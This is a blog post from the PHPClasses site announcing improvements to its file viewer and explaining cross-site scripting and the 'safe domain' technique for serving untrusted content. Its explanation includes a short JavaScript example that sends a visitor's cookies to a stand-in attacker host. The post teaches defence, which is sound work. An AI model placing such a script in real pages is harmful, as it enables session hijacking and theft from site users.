Author: Manuel Lemos
Categories: PHP Security
This post announces several improvements to the way the files of the packages available on the site can be viewed.
It explains at length the security concerns of presenting content from untrusted sources, specifically those that may lead to the security abuses known as cross-site scripting.
Several solutions to prevent cross-site scripting exploits are presented. A not very well known solution named "safe domain", which is used by the site, is presented in detail.
Contents
* PHP code syntax highlighting
* Feature suggestions
* Inadvertent bandwidth and CPU usage
* Inline HTML and Flash files
* Cross-site scripting security exploit prevention
* Advertising, mash-ups and RSS feeds concerns
* Avoiding cross-site scripting exploits
* The safe domain technique
* Other file types
* Other concerns
* PHP code syntax highlighting
One of the most appreciated features of the PHPClasses site is the ability to view the contents of the files of a package without needing to download it first. This month this feature was improved in several aspects.
One of the aspects is the color highlighting of PHP source code files. This was done with the PHP built-in function highlight_string. The colors are a bit different from the PHP defaults. Hopefully the current color choice is more readable.
If you are color blind or have another kind of eyesight limitation, just let me know if there are any adjustments to the color scheme that would improve the readability.
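A minimal sketch of how such highlighting can be produced, assuming the colors are overridden at run time through PHP's highlight.* configuration directives. The function name and the color values are hypothetical; they are not the ones used by the site.

```php
<?php
// Hypothetical palette: illustrative values, not the colors used by the site.
const HIGHLIGHT_COLORS = [
    'highlight.comment' => '#808080',
    'highlight.default' => '#000080',
    'highlight.html'    => '#000000',
    'highlight.keyword' => '#006000',
    'highlight.string'  => '#A00000',
];

// Returns the HTML produced by highlight_string() using the palette above.
function highlight_php_source(string $source): string
{
    foreach (HIGHLIGHT_COLORS as $directive => $color) {
        ini_set($directive, $color);
    }
    // The second argument makes highlight_string() return the HTML
    // instead of printing it.
    return highlight_string($source, true);
}
```

Calling highlight_php_source('<?php echo "hi"; ?>') returns markup in which the echo keyword is wrapped in a tag that carries the keyword color. The exact tags vary between PHP versions.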
* Feature suggestions
Although most users agree that PHP syntax highlighting is a good thing, it has only now been implemented. Actually, it was a feature suggested by Brandon Sussman. He submitted the idea to the bug report database as a feature enhancement.
Other people have suggested this and other features, but it is hard to keep track of all the requests and remember to implement them later when they are not recorded in this database.
If you have more feature requests, please do not hesitate to submit them to the PHPClasses bug database:
bugs.phpclasses.org/
I also received suggestions to implement code highlighting for source files of other languages. I plan to do it when I have more time to deploy components that support them. I also got a good suggestion to use the GeSHi package of Nigel McNie, which supports many languages.
phpclasses.org/geshi
* Inadvertent bandwidth and CPU usage
Unfortunately, features that seem simple to implement, like PHP code syntax highlighting, do not come for free. The HTML code of the highlighted files is 4 to 5 times larger than the original files.
The PHPClasses site uses mod_gzip to serve all pages in compressed format, whether they were generated by PHP or not.
schroepl.net/projekte/mod_gzip/
If you are using Apache 2, you can use the built-in mod_deflate module instead.
This is very good because it reduces the size of HTML pages at least 5 times. In the case of highlighted PHP code, the pages become on average 15 times smaller because they contain many repeated <font> tags.
This is a great reduction, but it consumes too much CPU when done on demand. Therefore PHP code highlighting is restricted to files smaller than a given size limit. Currently the size limit is 10KB, but it may change in the future. Premium subscribers will always see all PHP files highlighted.
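The size restriction described above could look roughly like the following sketch. The constant and function names are hypothetical, and the fallback to escaped plain text for larger files is an assumption about what is shown instead of the highlighted version.

```php
<?php
// Size limit mentioned in the post; the constant name is hypothetical.
const HIGHLIGHT_SIZE_LIMIT = 10240; // 10KB

// Returns highlighted HTML for small files or premium subscribers,
// and escaped plain text otherwise.
function render_php_file(string $source, bool $isPremium = false): string
{
    if ($isPremium || strlen($source) < HIGHLIGHT_SIZE_LIMIT) {
        return highlight_string($source, true);
    }
    // Too large to highlight on demand: show the source without colors.
    return '<pre>' . htmlspecialchars($source, ENT_QUOTES, 'UTF-8') . '</pre>';
}
```

Checking the size before calling highlight_string() keeps the expensive work away from large files, while the premium flag bypasses the check.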
* Inline HTML and Flash files
The presentation of HTML and Flash files was also improved.
Formerly, they were displayed in a separate browser window. Now, these types of files are displayed in the same file page using an inline frame. Nowadays most browsers support inline frames, so this solution should not cause any problems.
* Cross-site scripting security exploit prevention
Displaying the HTML and Flash files submitted by the site users raises certain security concerns.
The problem is that these kinds of files may contain scripting code in either JavaScript or ActionScript. Such code may be executed when the files are displayed in a common browser.
Although I do not expect an author to submit HTML or Flash files with malicious code, I cannot assume that it will never happen.
Wherever you provide a privilege, sooner or later somebody will try to abuse it. So, better safe now than sorry later. Therefore, such kinds of files are treated as untrusted content.
If you are not aware of the security hazards of serving untrusted content, let me explain what could happen.
When you serve HTML or Flash files from a certain domain, the contained JavaScript or ActionScript may have access to all the cookies served by that domain.
This circumstance can be abused using files with malicious code that could send the cookies of one domain to another site by performing requests to URLs composed using JavaScript/ActionScript. This is why these security exploits are called cross-site scripting.
Consider for instance the following HTML excerpt with malicious JavaScript. Flash files may also contain ActionScript code for the same purpose.
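<script>
// Requests a URL on the attacker's server with the victim's cookies in the query string.
// The closing tag is split so that it does not end the enclosing script block prematurely.
document.write('<script src="http://www.abuser.com/get_cookies?cookies=' + encodeURIComponent(document.cookie) + '"><\/script>');
</script>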
The problem is that cookies are often used as session identifiers of logged-in users. If somebody steals the cookies that your browser uses to access a domain, that person can access the same site on your behalf and abuse the privileges that you have.
Depending on what each site provides, the consequences can be catastrophic. Imagine if you are accessing an e-commerce site that stores information about your credit card and displays it in your profile pages. An attacker may steal that information and cause you financial losses.
Of course most e-commerce sites are not so weakly implemented, but you can imagine a myriad of situations in which cross-site scripting exploits may cause major headaches.
* Advertising, mash-ups and RSS feeds concerns
Another form of cross-site scripting exploit may occur when one site displays HTML content from another site.
Most forms of advertising served by ad agencies require placing HTML tags that contain JavaScript to retrieve the ad contents from remote servers.
Most ad agencies are reputable and can be considered trustworthy, but I have already read reports of users complaining that certain ads cause undesirable effects, like prompting the users to download malware or other kinds of intrusive programs.
Although this is not exactly a cross-site scripting exploit, I wonder if all the JavaScript and Flash animations placed by all advertising agencies are carefully audited.
Another topic that makes me wonder is the recent mania about mash-up sites. As I explained in a previous post, mash-ups are sites composed of content retrieved from other sites.
In many cases the remote content is served via JavaScript, so it can be updated dynamically without changing the mash-up site. This is another possible way by which the cookies served by one domain can be accessed by the remote site scripts.
Another way to obtain content from other sites is through the use of RSS feeds. In the beginning this was not really a problem because you were only syndicating text content.
As long as you encode the text properly to display it in HTML pages, using for instance the HtmlSpecialChars() function, there is nothing to be concerned about with RSS feeds.
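As a small illustration of that encoding step, the sketch below escapes a plain text feed field before placing it in a page. The function name and the sample title are hypothetical.

```php
<?php
// Escapes a plain text feed field so that it is displayed literally in an HTML page.
function feed_text_to_html(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}

// Hypothetical feed item title containing markup that must not be interpreted.
$title = 'New release <script>alert(1)</script> & notes';
echo '<h2>', feed_text_to_html($title), "</h2>\n";
```

The script tag in the title reaches the browser as &lt;script&gt; text, so it is shown to the reader instead of being executed.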
Meanwhile several sites started providing HTML content within their RSS feeds. This should never be a problem as long as you use only the plain text feed items.
However, if you use the HTML content as it is served within such RSS feeds, there is always the chance of abuse by means of HTML tags with malicious JavaScript code in them.
All these concerns should be taken seriously only if you have reason to not trust the HTML code that you are using from other sites.
* Avoiding cross-site scripting exploits
There are several techniques to avoid or at least minimize possible cross-site scripting exploits.
One of the techniques consists of filtering the HTML code to remove any JavaScript. There are several solutions for that purpose, like the PHP Input Filter class by Daniel Morris:
phpclasses.org/inputfilter
Solutions like this are great, but unfortunately they require removing parts of the HTML pages that may be necessary to make them display properly.
There are also solutions to minimize the chances of successful session cookie stealing, like for instance session identifier regeneration and origin IP verification. You may find several classes that implement these solutions here:
phpclasses.org/browse/class/78/top/...
These solutions are advisable but they are not perfect because they do not eliminate the problem.
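The two session measures mentioned above, session identifier regeneration and origin IP verification, can be sketched as follows. This is only an illustration under stated assumptions: the function names and the origin_ip key are hypothetical, and a strict IP check may reject legitimate users whose address changes between requests.

```php
<?php
// Records the client address on first use and rejects later requests
// that come from a different address. $session is passed by reference
// so that the function can be called with $_SESSION.
function session_origin_is_valid(array &$session, string $remoteAddress): bool
{
    if (!isset($session['origin_ip'])) {
        $session['origin_ip'] = $remoteAddress;
        return true;
    }
    return $session['origin_ip'] === $remoteAddress;
}

// Meant to be called right after a successful login, so that an
// identifier copied before the login stops being valid.
function regenerate_session_on_login(): void
{
    if (session_status() === PHP_SESSION_ACTIVE) {
        // Passing true also deletes the data stored under the old identifier.
        session_regenerate_id(true);
    }
}
```

In a page script, session_origin_is_valid($_SESSION, $_SERVER['REMOTE_ADDR']) would be called after session_start(), and the session would be destroyed when it returns false.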
* The safe domain technique
The PHPClasses site relies mostly on a solution for serving untrusted content that is called "safe domain". It has been in place for a couple of years. Before that, the site did not display HTML or Flash files directly.
The cookies that may be stolen by content with malicious JavaScript/ActionScript code are only the cookies of the domain from which the content is served.
Therefore the PHPClasses site serves untrusted content from a different domain. It is neither phpclasses.org nor one of its sub-domains. Currently it uses a domain named safe.phpclasses.net. Notice that even the top level domain .net is different from .org.
This is made transparent for the user. As I mentioned above, the HTML and Flash files are served in an inline frame.
Since the frame and the parent browser window are from different domains, any attempt by malicious JavaScript code in the inline frame to access the cookies of the actual site would result in a JavaScript security error.
This way the site can display untrusted HTML or Flash without mangling it.
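A minimal sketch of how a page on the main site could embed an untrusted file served from the safe domain. Only the host name safe.phpclasses.net comes from this post. The http scheme, the path layout, the frame dimensions and the function name are assumptions made for illustration.

```php
<?php
// Origin that serves untrusted files. The host name is the one mentioned
// in the post; the scheme is an assumption.
const SAFE_CONTENT_ORIGIN = 'http://safe.phpclasses.net';

// Builds an inline frame tag that loads an untrusted file from the safe domain.
function untrusted_file_frame(string $path, int $width = 600, int $height = 400): string
{
    // Encode each path segment so that the file name cannot alter the URL.
    $segments = array_map('rawurlencode', explode('/', ltrim($path, '/')));
    $url = SAFE_CONTENT_ORIGIN . '/' . implode('/', $segments);

    return sprintf(
        '<iframe src="%s" width="%d" height="%d"></iframe>',
        htmlspecialchars($url, ENT_QUOTES, 'UTF-8'),
        $width,
        $height
    );
}
```

The page itself is still served from the main domain. Only the frame contents come from the other domain, so scripts inside the frame run with the cookies of the safe domain and not those of the main site.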
* Other file types
Several authors asked me to allow submitting files in other formats, for instance PDF. I have been reluctant to do so, also for security reasons.
First, I need to have a way to verify whether the files are exactly of the type they claim to be. I cannot rely on the file name extension to determine the file type, as is done under Windows and other insecure systems.
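One common way to check a file type without trusting the file name is to look at the first bytes of the content. The sketch below assumes a short, illustrative list of signatures and uses hypothetical function names. A matching signature says nothing about whether the file is safe to serve.

```php
<?php
// Leading byte signatures of a few formats. The list is illustrative, not exhaustive.
const FILE_SIGNATURES = [
    'application/pdf'               => ['%PDF-'],
    'image/png'                     => ["\x89PNG\r\n\x1a\n"],
    'image/gif'                     => ['GIF87a', 'GIF89a'],
    'application/x-shockwave-flash' => ['FWS', 'CWS'],
];

// Returns the type whose signature matches the start of the content, or null.
function detect_type_from_content(string $bytes): ?string
{
    foreach (FILE_SIGNATURES as $type => $signatures) {
        foreach ($signatures as $signature) {
            if (strncmp($bytes, $signature, strlen($signature)) === 0) {
                return $type;
            }
        }
    }
    return null;
}

// Tells whether the content really looks like the type it claims to be.
function content_matches_claimed_type(string $bytes, string $claimedType): bool
{
    return detect_type_from_content($bytes) === $claimedType;
}
```

PHP's fileinfo extension performs a much more complete detection of this kind, so a hand-written table like this one is only meant to show the idea.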
Second, I need to determine whether each file type is safe to be served to the users' browsers without relying on manual auditing. It would not be admissible to serve files that may be used to spread any form of virus or malware.
Over time I may add support for displaying other file types if these conditions can be satisfied.
* Other concerns
Security is a delicate matter. No matter how much you learn about security and apply in practice, there will always be other ways to abuse a site.
If you have questions or other concerns about the security aspects mentioned in this post, feel free to post a comment.
Regards,
Manuel Lemos